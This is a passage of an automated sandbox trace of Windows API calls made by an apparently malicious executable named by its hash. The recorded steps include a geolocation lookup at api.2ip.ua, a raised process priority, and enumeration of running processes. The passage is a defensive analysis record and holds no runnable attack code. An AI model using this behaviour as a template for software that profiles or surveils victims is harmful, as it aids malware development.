lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0081.372] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x13) returned 0x7217a8 [0081.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x7217a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=kEecfMwgj", lpUsedDefaultChar=0x0) returned 19 [0081.372] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721870) returned 0x84 [0081.372] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721870, Size=0x88) returned 0x721870 [0081.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0081.372] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x1f) returned 0x71ec10 [0081.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x71ec10, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 31 [0081.372] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721870) returned 0x88 [0081.372] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721870, Size=0x8c) returned 0x721870 [0081.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0081.372] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x12) returned 0x7217c8 [0081.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x7217c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0081.372] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721870) returned 0x8c [0081.372] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721870, Size=0x90) returned 0x721870 [0081.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0081.372] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x18) returned 0x721908 [0081.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x721908, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0081.372] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721870) returned 0x90 [0081.372] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721870, Size=0x94) returned 0x721928 [0081.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0081.373] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x46) returned 0x716e80 [0081.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x716e80, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0081.373] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721928) returned 0x94 [0081.373] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721928, Size=0x98) returned 0x721928 [0081.429] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x720e70) returned 0x80 [0081.430] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x720e70) returned 0x80 [0081.430] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x720e70) returned 0x80 [0081.457] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x8ec) returned 0x7219c8 [0081.457] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x720e70) returned 0x80 [0081.458] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x10) returned 0x713208 [0081.459] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x720e70) returned 0x80 [0081.459] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x720e70) returned 0x80 [0081.459] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x720e70) returned 0x80 [0081.485] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x720e70) returned 0x80 [0081.511] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0082.816] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x40) returned 0x712790 [0082.823] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0091.101] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18c1c8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18e9c8 | out: lpBuffer=0x18c1c8*, lpdwNumberOfBytesRead=0x18e9c8*=0x22a) returned 1 [0091.101] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0091.102] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0091.102] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x20) returned 0x728668 [0091.109] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x240) returned 0x737600 [0091.117] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x737600 | out: hHeap=0x700000) returned 1 [0091.118] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x728668 | out: hHeap=0x700000) returned 1 [0091.119] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x712790 | out: hHeap=0x700000) returned 1 [0091.125] GetCurrentProcess () returned 0xffffffff [0091.125] GetLastError () returned 0x0 [0091.125] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0091.131] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x10) returned 0x737218 [0091.150] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x8ec) returned 0x2bd7940 [0091.156] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x800) returned 0x73c210 [0091.156] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x73c210, nSize=0x400 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe")) returned 0x5f [0091.156] PathRemoveFileSpecW (in: pszPath="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" | out: pszPath="C:\\Users\\kEecfMwgj\\Desktop") returned 1 [0091.179] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x810) returned 0x2bd8238 [0091.179] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" " [0091.179] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" ", pNumArgs=0x18eaa8 | out: pNumArgs=0x18eaa8) returned 0x7d0a10*="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" [0091.179] lstrcpyW (in: lpString1=0x18f738, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" [0091.198] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" " [0091.198] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" ", pNumArgs=0x18ea44 | out: pNumArgs=0x18ea44) returned 0x7d0a10*="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" [0091.198] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned="1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" [0091.198] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x752b0000 [0091.199] GetProcAddress (hModule=0x752b0000, lpProcName="EnumProcesses") returned 0x0 [0091.199] GetProcAddress (hModule=0x752b0000, lpProcName="EnumProcessModules") returned 0x0 [0091.199] GetProcAddress (hModule=0x752b0000, lpProcName="GetModuleBaseNameW") returned 0x0 [0091.199] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x75950000 [0091.269] GetProcAddress (hModule=0x75950000, lpProcName="EnumProcesses") returned 0x75951544 [0091.269] GetProcAddress (hModule=0x75950000, lpProcName="EnumProcessModules") returned 0x75951408 [0091.269] GetProcAddress (hModule=0x75950000, lpProcName="GetModuleBaseNameW") returned 0x7595152c [0091.269] EnumProcesses (in: lpidProcess=0x184240, cb=0xa000, lpcbNeeded=0x18ea50 | out: lpidProcess=0x184240, lpcbNeeded=0x18ea50) returned 1 [0091.278] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0091.278] CloseHandle (hObject=0x0) returned 0 [0091.279] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0091.279] CloseHandle (hObject=0x0) returned 0 [0091.279] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10c) returned 0x0 [0091.279] CloseHandle (hObject=0x0) returned 0 [0091.279] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0091.279] CloseHandle (hObject=0x0) returned 0 [0091.279] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x174) returned 0x0 [0091.279] CloseHandle (hObject=0x0) returned 0 [0091.279] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x0 [0091.279] CloseHandle (hObject=0x0) returned 0 [0091.279] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1a8) returned 0x0 [0091.279] CloseHandle (hObject=0x0) returned 0 [0091.279] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0091.279] CloseHandle (hObject=0x0) returned 0 [0091.279] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0091.279] CloseHandle (hObject=0x0) returned 0 [0091.279] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0091.279] CloseHandle (hObject=0x0) returned 0 [0091.280] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0091.280] CloseHandle (hObject=0x0) returned 0 [0091.280] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0091.280] CloseHandle (hObject=0x0) returned 0 [0091.280] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0091.280] CloseHandle (hObject=0x0) returned 0 [0091.280] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0091.280] CloseHandle (hObject=0x0) returned 0 [0091.280] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0091.280] CloseHandle (hObject=0x0) returned 0 [0091.280] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0091.280] CloseHandle (hObject=0x0) returned 0 [0091.280] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0091.280] CloseHandle (hObject=0x0) returned 0 [0091.280] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x0 [0091.280] CloseHandle (hObject=0x0) returned 0 [0091.280] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x474) returned 0x4e8 [0091.281] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0091.281] CloseHandle (hObject=0x4e8) returned 1 [0091.281] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x494) returned 0x0 [0091.281] CloseHandle (hObject=0x0) returned 0 [0091.281] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x520) returned 0x0 [0091.281] CloseHandle (hObject=0x0) returned 0 [0091.281] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x558) returned 0x0 [0091.281] CloseHandle (hObject=0x0) returned 0 [0091.281] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x770) returned 0x4e8 [0091.281] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0091.282] CloseHandle (hObject=0x4e8) returned 1 [0091.282] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x77c) returned 0x4e8 [0091.282] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0091.282] CloseHandle (hObject=0x4e8) returned 1 [0091.282] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0091.282] CloseHandle (hObject=0x0) returned 0 [0091.282] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x78c) returned 0x0 [0091.282] CloseHandle (hObject=0x0) returned 0 [0091.282] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5d8) returned 0x0 [0091.282] CloseHandle (hObject=0x0) returned 0 [0091.282] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x734) returned 0x4e8 [0091.282] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.287] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x2c0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="iexplore.exe") returned 0xc [0091.287] CloseHandle (hObject=0x4e8) returned 1 [0091.287] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x134) returned 0x4e8 [0091.287] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.292] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x2c0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="iexplore.exe") returned 0xc [0091.293] CloseHandle (hObject=0x4e8) returned 1 [0091.293] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x844) returned 0x0 [0091.293] CloseHandle (hObject=0x0) returned 0 [0091.293] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x4e8 [0091.293] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.294] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xba0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="representshoot.exe") returned 0x12 [0091.295] CloseHandle (hObject=0x4e8) returned 1 [0091.295] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x4e8 [0091.295] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.296] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1080000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="watch wait.exe") returned 0xe [0091.297] CloseHandle (hObject=0x4e8) returned 1 [0091.297] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x93c) returned 0x4e8 [0091.297] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.298] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x3b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="also-involve.exe") returned 0x10 [0091.298] CloseHandle (hObject=0x4e8) returned 1 [0091.298] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x944) returned 0x4e8 [0091.299] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.300] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x920000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="range.exe") returned 0x9 [0091.301] CloseHandle (hObject=0x4e8) returned 1 [0091.301] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x94c) returned 0x4e8 [0091.301] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.302] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1220000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="good-buy.exe") returned 0xc [0091.302] CloseHandle (hObject=0x4e8) returned 1 [0091.303] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x954) returned 0x4e8 [0091.303] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.304] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xeb0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="heat full.exe") returned 0xd [0091.306] CloseHandle (hObject=0x4e8) returned 1 [0091.306] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x4e8 [0091.306] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.307] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x260000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="none.exe") returned 0x8 [0091.308] CloseHandle (hObject=0x4e8) returned 1 [0091.308] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x964) returned 0x4e8 [0091.308] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.309] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x11b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="existphonefollow.exe") returned 0x14 [0091.310] CloseHandle (hObject=0x4e8) returned 1 [0091.310] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x4e8 [0091.310] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.311] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x840000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="direction.exe") returned 0xd [0091.312] CloseHandle (hObject=0x4e8) returned 1 [0091.312] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x974) returned 0x4e8 [0091.312] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.313] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xee0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="again_after.exe") returned 0xf [0091.314] CloseHandle (hObject=0x4e8) returned 1 [0091.314] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x97c) returned 0x4e8 [0091.314] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.315] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1240000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="include.exe") returned 0xb [0091.316] CloseHandle (hObject=0x4e8) returned 1 [0091.316] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x984) returned 0x4e8 [0091.316] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.317] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xbf0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="very land.exe") returned 0xd [0091.318] CloseHandle (hObject=0x4e8) returned 1 [0091.318] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b0) returned 0x4e8 [0091.318] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.319] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1280000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="according although relate.exe") returned 0x1d [0091.320] CloseHandle (hObject=0x4e8) returned 1 [0091.320] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9bc) returned 0x4e8 [0091.320] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.323] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xc10000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="soldier foot themselves.exe") returned 0x1b [0091.323] CloseHandle (hObject=0x4e8) returned 1 [0091.323] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c8) returned 0x4e8 [0091.324] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.325] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xc0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="before_deal_next.exe") returned 0x14 [0091.325] CloseHandle (hObject=0x4e8) returned 1 [0091.325] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9d4) returned 0x4e8 [0091.326] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.327] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xa00000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="season_who.exe") returned 0xe [0091.327] CloseHandle (hObject=0x4e8) returned 1 [0091.327] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e0) returned 0x4e8 [0091.327] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.329] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x120000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="pay.exe") returned 0x7 [0091.329] CloseHandle (hObject=0x4e8) returned 1 [0091.329] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ec) returned 0x4e8 [0091.329] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.331] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb80000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="disease.exe") returned 0xb [0091.331] CloseHandle (hObject=0x4e8) returned 1 [0091.331] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x4e8 [0091.331] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.333] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x9d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="during_violence.exe") returned 0x13 [0091.333] CloseHandle (hObject=0x4e8) returned 1 [0091.333] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb0) returned 0x4e8 [0091.333] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.335] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="action.exe") returned 0xa [0091.335] CloseHandle (hObject=0x4e8) returned 1 [0091.335] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb8) returned 0x4e8 [0091.335] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.337] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb90000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0091.337] CloseHandle (hObject=0x4e8) returned 1 [0091.337] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc0) returned 0x4e8 [0091.337] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.339] GetModuleBaseNameW (in: hProcess=0x4e8, 